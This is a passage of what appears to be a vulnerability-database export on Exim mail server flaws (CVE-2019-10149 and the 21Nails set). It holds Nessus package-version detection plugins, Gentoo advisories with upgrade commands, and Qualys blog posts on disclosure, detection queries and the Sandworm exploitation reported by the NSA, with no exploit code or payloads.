value:\"CEA-2019-0413\");\n\n script_name(english:\"Amazon Linux AMI : exim (ALAS-2019-1221)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A flaw was found in Exim versions 4.87 to 4.91 before release 1.20\n(inclusive). Improper validation of recipient address in\ndeliver_message() function in /src/deliver.c may lead to remote\ncommand execution. (CVE-2019-10149)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2019-1221.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update exim' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10149\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-greylist\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:exim-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"exim-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-debuginfo-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-greylist-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mon-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mysql-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-pgsql-4.91-1.20.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-greylist / exim-mon / exim-mysql / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-25T14:25:59", "description": "The remote host is affected by the vulnerability described in GLSA-201906-01 (Exim: Remote command execution)\n\n A vulnerability was discovered in how Exim validates recipient addresses in the deliver_message() function.\n Impact :\n\n A remote attacker could execute arbitrary commands by sending an email with a specially crafted recipient address to the affected system.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2019-06-07T00:00:00", "type": "nessus", "title": "GLSA-201906-01 : Exim: Remote command execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:exim", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201906-01.NASL", "href": "https://www.tenable.com/plugins/nessus/125751", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201906-01.\n#\n# The advisory text is Copyright (C) 2001-2022 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125751);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"GLSA\", value:\"201906-01\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0413\");\n\n script_name(english:\"GLSA-201906-01 : Exim: Remote command execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-201906-01\n(Exim: Remote command execution)\n\n A vulnerability was discovered in how Exim validates recipient addresses\n in the deliver_message() function.\n \nImpact :\n\n A remote attacker could execute arbitrary commands by sending an email\n with a specially crafted recipient address to the affected system.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201906-01\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Exim users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/exim-4.92'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10149\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-mta/exim\", unaffected:make_list(\"ge 4.92\"), vulnerable:make_list(\"lt 4.92\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Exim\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "gentoo": [{"lastseen": "2023-06-06T15:24:41", "description": "### Background\n\nExim is a message transfer agent (MTA) designed to be a a highly configurable, drop-in replacement for sendmail. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Exim. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker, by connecting to the SMTP listener daemon, could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. Furthermore, a local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application or escalate privileges. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Exim users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-mta/exim-4.94.2\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-04T00:00:00", "type": "gentoo", "title": "Exim: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2021-05-04T00:00:00", "id": "GLSA-202105-01", "href": "https://security.gentoo.org/glsa/202105-01", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-13T15:03:38", "description": "### Background\n\nExim is a message transfer agent (MTA) designed to be a a highly configurable, drop-in replacement for sendmail. \n\n### Description\n\nA vulnerability was discovered in how Exim validates recipient addresses in the deliver_message() function. \n\n### Impact\n\nA remote attacker could execute arbitrary commands by sending an email with a specially crafted recipient address to the affected system. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Exim users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-mta/exim-4.92\"", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-06-06T00:00:00", "type": "gentoo", "title": "Exim: Remote command execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-06T00:00:00", "id": "GLSA-201906-01", "href": "https://security.gentoo.org/glsa/201906-01", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-06-14T06:32:34", "description": "**Update May 7, 2021**: Exim has released a security update to address multiple vulnerabilities in Exim versions prior to 4.94.2. See the [CISA announcement](<https://us-cert.cisa.gov/ncas/current-activity/2021/05/07/exim-releases-security-update>).\n\n**Original Post**: The Qualys Research Team has discovered multiple critical vulnerabilities in the Exim mail server, some of the which can be chained together to obtain full remote unauthenticated code execution and gain root privileges. Qualys recommends security teams to apply patches for these vulnerabilities as soon as possible.\n\n### About Exim\n\n[Exim](<https://www.exim.org/>) is a popular mail transfer agent (MTA) available for major Unix-like operating systems and comes pre-installed on Linux distributions such as Debian. According to a recent survey, an estimated 60% of internet servers run on Exim. A [Shodan search](<https://www.shodan.io/>) reveals nearly 4 million Exim servers are exposed to the internet.\n\nMail Transfer Agents are interesting targets for attackers because they are usually accessible over the internet. Once exploited, they could modify sensitive email settings on the mail servers, allow adversaries to create new accounts on the target mail servers. Last year, the vulnerability in the Exim Mail Transfer Agent (MTA) was a target of Russian cyber actors formally known as the sandworm team.\n\n### Exim Vulnerabilities\n\n![](https://blog.qualys.com/wp-content/uploads/2021/05/image001-2-300x169.png)\n\nLast fall, the Qualys Research Team engaged in a thorough code audit of Exim and discovered 21 unique vulnerabilities. Ten of these vulnerabilities can be exploited remotely. Some of them leading to provide root privileges on the remote system. And eleven can be exploited locally with most of them can be exploited in either default configuration or in a very common configuration. Some of the vulnerabilities can be chained together to obtain a full remote unauthenticated code execution and gain root privileges on the Exim Server. Most of the vulnerabilities discovered by the Qualys Research Team for e.g. CVE-2020-28017 affects all versions of Exim going back all the way to 2004 (going back to the beginning of its Git history 17 years ago).\n\n### Proof of Concept\n\n### Vulnerability Summary\n\nCVE| Description| Type \n---|---|--- \nCVE-2020-28007| Link attack in Exim's log directory| Local \nCVE-2020-28008| Assorted attacks in Exim's spool directory| Local \nCVE-2020-28014| Arbitrary file creation and clobbering| Local \nCVE-2021-27216| Arbitrary file deletion| Local \nCVE-2020-28011| Heap buffer overflow in queue_run()| Local \nCVE-2020-28010| Heap out-of-bounds write in main()| Local \nCVE-2020-28013| Heap buffer overflow in parse_fix_phrase()| Local \nCVE-2020-28016| Heap out-of-bounds write in parse_fix_phrase()| Local \nCVE-2020-28015| New-line injection into spool header file (local)| Local \nCVE-2020-28012| Missing close-on-exec flag for privileged pipe| Local \nCVE-2020-28009| Integer overflow in get_stdinput()| Local \nCVE-2020-28017| Integer overflow in receive_add_recipient()| Remote \nCVE-2020-28020| Integer overflow in receive_msg()| Remote \nCVE-2020-28023| Out-of-bounds read in smtp_setup_msg()| Remote \nCVE-2020-28021| New-line injection into spool header file (remote)| Remote \nCVE-2020-28022| Heap out-of-bounds read and write in extract_option()| Remote \nCVE-2020-28026| Line truncation and injection in spool_read_header()| Remote \nCVE-2020-28019| Failure to reset function pointer after BDAT error| Remote \nCVE-2020-28024| Heap buffer underflow in smtp_ungetc()| Remote \nCVE-2020-28018| Use-after-free in tls-openssl.c| Remote \nCVE-2020-28025| Heap out-of-bounds read in pdkim_finish_bodyhash()| Remote \n| | \n \nSuccessful exploitation of these vulnerabilities would allow a remote attacker to gain full root privileges on the target server and execute commands to install programs, modify data, and create new accounts. Qualys security researchers independently verified these vulnerabilities and developed exploits to obtain full root privileges.\n\nAs soon as the Qualys Research Team confirmed the vulnerabilities, Qualys engaged in responsible vulnerability disclosure and coordinated with Exim developers and open-source distributions to announce the vulnerability. See Disclosure Timeline.\n\n### Technical Details\n\nThe technical details of all 21 vulnerabilities can be found on [Qualys Security Advisories](<https://www.qualys.com/research/security-advisories/>) or at: <https://www.qualys.com/2021/05/04/21nails/21nails.txt>\n\n### Qualys Coverage\n\nGiven the breadth of the attack surface for this vulnerability, Qualys recommends users apply patches for this vulnerability immediately. Qualys customers can search the vulnerability knowledgebase for "21Nails\u201d to identify all the QIDs and assets vulnerable for this vulnerability.\n\nQualys is releasing the QIDs in the table below as they become available starting with vulnsigs version VULNSIGS-2.5.174-2 and Linux [Cloud Agent](<https://www.qualys.com/cloud-agent/>) manifest version lx_manifest-2.5.174.2-1.\n\nQID| Title| VulnSigs Version \n---|---|--- \n50110| Exim Mail Server Multiple Vulnerabilities (21Nails)| VULNSIGS-2_5_174-2 / lx_manifest-2.5.174.2-1 \n178576| Debian Security Update for exim4 (DSA 4912-1) (21Nails)| VULNSIGS-2_5_177-2 / lx_manifest-2.5.177.2-1 \n198350| Ubuntu Security Notification for Exim4 Vulnerabilities (USN-4934-1) (21Nails)| VULNSIGS-2_5_177-2 / lx_manifest-2.5.177.2-1 \n \n### Discover Vulnerable Exim Servers Using Qualys VMDR\n\n#### Identify Assets Running Exim\n\nThe first step in managing these critical vulnerabilities and reducing risk is identification of assets running Exim software. [Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) makes it easy to identify such assets.\n\nQuery: `software:(name:\"Exim\")`\n\n![](https://blog.qualys.com/wp-content/uploads/2021/05/image002-1-1070x394.png)\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 \u201cExim Assets\u201d. This helps in automatically grouping existing hosts with the above vulnerabilities as well as any new Exim-based assets that spin up in your environment. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n#### Prioritize Based on RTIs\n\nUsing VMDR, the Exim vulnerabilities can be prioritized using the following real-time threat indicators (RTIs):\n\n * Predicted_High_Risk\n * Wormable\n * Remote_Code_Execution\n * Privilege_Escalation\n * Unauthenticated_Exploitation\n * High_Lateral_Movement\n![](https://blog.qualys.com/wp-content/uploads/2021/05/image003-1070x719.png)\n\n#### Detect Impacted Assets with Threat Protection\n\nVMDR also enables you to automatically map assets vulnerable to these vulnerabilities using [Threat Protection](<https://www.qualys.com/apps/threat-protection/>).\n\n![](https://blog.qualys.com/wp-content/uploads/2021/05/image004-1070x833.png)\n\n### Dashboard\n\nWith VMDR Dashboard, you can track this vulnerability, their impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of these vulnerabilities trends in your environment using the \u201c21Nails\u201d Dashboard.\n\nView and download the ["21Nails\u201d dashboard here](<https://qualys-secure.force.com/customer/s/article/000006647>):\n\n![](https://blog.qualys.com/wp-content/uploads/2021/05/image005-1-1070x657.png)\n\n### Free 30-Day VMDR Service\n\nTo help security teams assess and mitigate their risk exposure to the Exim vulnerabilities (21Nails), Qualys is offering an [integrated VMDR service](<https://www.qualys.com/forms/exim-vulnerabilities/>) free for 30 days to identify vulnerable assets.\n\n### Disclosure Timeline\n\n**2020-10-20**: The Qualys Research Team (QRT) informed Exim (security@exim) about the new vulnerabilities. \n**2020-10-28**: QRT shared the first draft of the advisory. The vendor immediately acknowledged and started to work on patches. \n**2020-10-29**: QRT sent a list of 10 secondary issues to Exim. \n**2020-10-30**: QRT requested 20 CVEs from Mitre. They were assigned on the same day and immediately transmitted to Exim. \n**2020-11-13**: Exim gave QRT read access to their private Git repository to review patches. We started reviewing first set of patches (which tackled 7 CVEs). \n**2020-11-17 and 2020-11-18**: QRT sent a two-part patch review to Exim since several patches were incomplete. \n**2020-12-02**: A second set of patches (which tackled 7 secondary issues) appeared in Exim's private Git repository. We started reviewing it. \n**2020-12-09**: We sent our second patch review to Exim. \n**2021-01-28**: We mailed Exim and offered to work on the incomplete and missing patches. \n**2021-02-05**: Exim acknowledged our mail. We started to write a minimal but complete set of patches (on top of exim-4.94+fixes). \n**2021-02-15**: While working on a patch for CVE-2020-28014, we discovered CVE-2021-27216. We requested a CVE from Mitre, and immediately sent a heads-up to Exim. \n**2021-02-24**: We completed our minimal set of patches and sent it to Exim. \n**2021-04-17**: Exim proposed 2021-05-04 for the Coordinated Release Date. \n**2021-04-19**: We accepted the proposed Coordinated Release Date. \n**2021-04-21**: Exim publicly announced the impending security release. \n**2021-04-27**: Exim provided packagers and maintainers with access to its security Git repository. \n**2021-05-04**: Coordinated Release Date.\n\nAs you can see from the disclosure timeline, it was a long process from when the vulnerabilities were first discovered and reported to the point patches were available for these vulnerabilities. All in all, the Qualys Research Team helped report these vulnerabilities and provide 26 patches. A testament to our commitment to responsible disclosure.\n\n### Vendor References\n\n<https://www.openwall.com/lists/oss-security/2021/05/04/6>\n\n<https://www.qualys.com/2021/05/04/21nails/21nails.txt>\n\n<https://www.exim.org/static/doc/security/CVE-2020-qualys/>\n\n### Frequently Asked Questions (FAQs)\n\n###### What versions are vulnerable?\n\nAll versions before Exim-4.94.2 are vulnerable.\n\n###### Why name the vulnerability \u201c21Nails\u201d?\n\nIt\u2019s a pun on 21 vulnerabilities in a \u201cMail\u201d transfer agent. With each nail representing one vulnerability.\n\n###### Will the Qualys Research Team publish exploit code for this vulnerability?\n\nNo.", "cvss3": {}, "published": "2021-05-04T14:10:41", "type": "qualysblog", "title": "21Nails: Multiple Critical Vulnerabilities in Exim Mail Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-28007", "CVE-2020-28008", "CVE-2020-28009", "CVE-2020-28010", "CVE-2020-28011", "CVE-2020-28012", "CVE-2020-28013", "CVE-2020-28014", "CVE-2020-28015", "CVE-2020-28016", "CVE-2020-28017", "CVE-2020-28018", "CVE-2020-28019", "CVE-2020-28020", "CVE-2020-28021", "CVE-2020-28022", "CVE-2020-28023", "CVE-2020-28024", "CVE-2020-28025", "CVE-2020-28026", "CVE-2021-27216"], "modified": "2021-05-04T14:10:41", "id": "QUALYSBLOG:4670C5BC6972C137122A7C820F9793F0", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-15T00:29:31", "description": "Last week, Qualys issued a [security advisory](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>) for a vulnerability we discovered during a code review of Exim. This vulnerability can lead to Remote Command Injection, and is currently being [actively attacked](<https://www.helpnetsecurity.com/2019/06/14/exploiting-cve-2019-10149/>) in the wild. This blog will show you how to quickly identify assets that are impacted by this vulnerability.\n\n### The Vulnerability\n\nThis vulnerability exists in all versions of Exim's MTA from version 4.87 to 4.91. Exploitation of the vulnerability only requires a malicious email to be sent to a vulnerable server, and injected commands will typically run as root. There are multiple ways that Exim can be configured, and some of these will allow for faster exploitation, while others may require a week to fully exploit. For technical details on this vulnerability please see our [security advisory](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>).\n\n### Detecting CVE-2019-10149\n\nThe best method for identifying vulnerable hosts is through the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) or via authenticated scanning. Several QIDs have been released for various Linux distros, as well as a generic remote Potential QID that will identify Exim hosts.\n\n### Finding Vulnerable Hosts\n\nThe fastest way to locate vulnerable hosts is though the [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) Live Feed as seen here:\n\n![](https://blog.qualys.com/wp-content/uploads/2019/06/Screen-Shot-2019-06-14-at-11.45.42-AM-300x183.png)\n\nSimply click on the impacted assets number to see a list of hosts with this vulnerability. For customers without Threat Protection, you can manually search for the CVE in AssetView, by using this search string:\n \n \n vulnerabilities.vulnerability.cveIds:`CVE-2019-10149`\n\nThis will return a list of all impacted hosts. The results can also be grouped by Vulnerability, which will allow you to determine which distro patches are needed. To filter out the Potential detections (though these should be evaluated), you can modify the query like this:\n \n \n vulnerabilities:(vulnerability.cveIds:`CVE-2019-10149` and typeDetected:`Confirmed`)\n\n### Remediation\n\nTo remediate this vulnerability, Exim must be updated to version 4.92. Check your Linux OS vendor for updated packages.", "cvss3": {}, "published": "2019-06-14T22:27:14", "type": "qualysblog", "title": "Exim MTA Vulnerability (The Return of the WIZard \u2013 CVE-2019-10149)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-10149"], "modified": "2019-06-14T22:27:14", "id": "QUALYSBLOG:EE3A76FB5EA09543FF235E8362A83373", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2019/06/14/exim-mta-vulnerability-the-return-of-the-wizard-cve-2019-10149", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-05T19:50:44", "description": "The Exim MTA vulnerability, initially [reported by Qualys](<https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt>) in May 2019, is currently being exploited in the wild. Recently, the US National Security Agency (NSA) [announced](<https://www.us-cert.gov/ncas/current-activity/2020/05/28/nsa-releases-advisory-sandworm-actors-exploiting-exim>) that Sandworm actors (Russian hacker group) have been actively exploiting the Exim Mail Transfer Agent vulnerability.\n\nQualys released a blog post last year describing how to identify assets that are impacted by this vulnerability in your environment: [Exim MTA Vulnerability (The Return of the WIZard \u2013 CVE-2019-10149)](<https://blog.qualys.com/laws-of-vulnerabilities/2019/06/14/exim-mta-vulnerability-the-return-of-the-wizard-cve-2019-10149>)\n\n### Sandworm Attacks\n\nExim MTA vulnerability could be exploited by sending a malicious email to the server, allowing an attacker to run code on the server remotely. This vulnerability can lead to Remote Command Injection, and is currently being [actively attacked](<https://www.helpnetsecurity.com/2019/06/14/exploiting-cve-2019-10149/>) in the wild.\n\nNSA mentioned Sandworm actors have been exploiting this vulnerability since at least August 2019. The actors exploited victims using Exim software on their public facing MTAs by sending a command in the \"MAIL FROM\" field of an SMTP (Simple Mail Transfer Protocol) message. Sandworm executed shell script to perform following action on victim's system:\n\n * Add privileged users\n * Disable Network Security settings\n * Update SSH configurations to enable remote access\n * Execute an additional script to enable follow-on exploitation\n\nThe unpatched systems are highly at risk and immediate action should be taken to remediate this vulnerability.\n\n### Detecting CVE-2019-10149\n\nThe best method for identifying vulnerable hosts is through the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>) or via authenticated scanning. Qualys released several QIDs for various Linux distros, as well as a generic remote Potential QID (50092) that will identify Exim hosts. You can search for these QIDs in VM Dashboard by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds:`CVE-2019-10149`_\n\n![](https://blog.qualys.com/wp-content/uploads/2020/05/Screen-Shot-2020-05-29-at-3.49.40-PM.png)\n\nIn addition, [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) customers can effectively prioritize this vulnerability as Qualys QID 50092 contains following RTIs (Real-Time Threat Indicators):\n\n * Active Attacks\n * Public Exploit\n * Predicted High Risk\n * Wormable\n![](https://blog.qualys.com/wp-content/uploads/2020/05/Screen-Shot-2020-05-29-at-4.09.50-PM.png)\n\nVMDR customers can also stay on top of these threats proactively via the 'live feed' provided for threat prioritization. With 'live feed' updated for all emerging high and medium risks, you can clearly see the 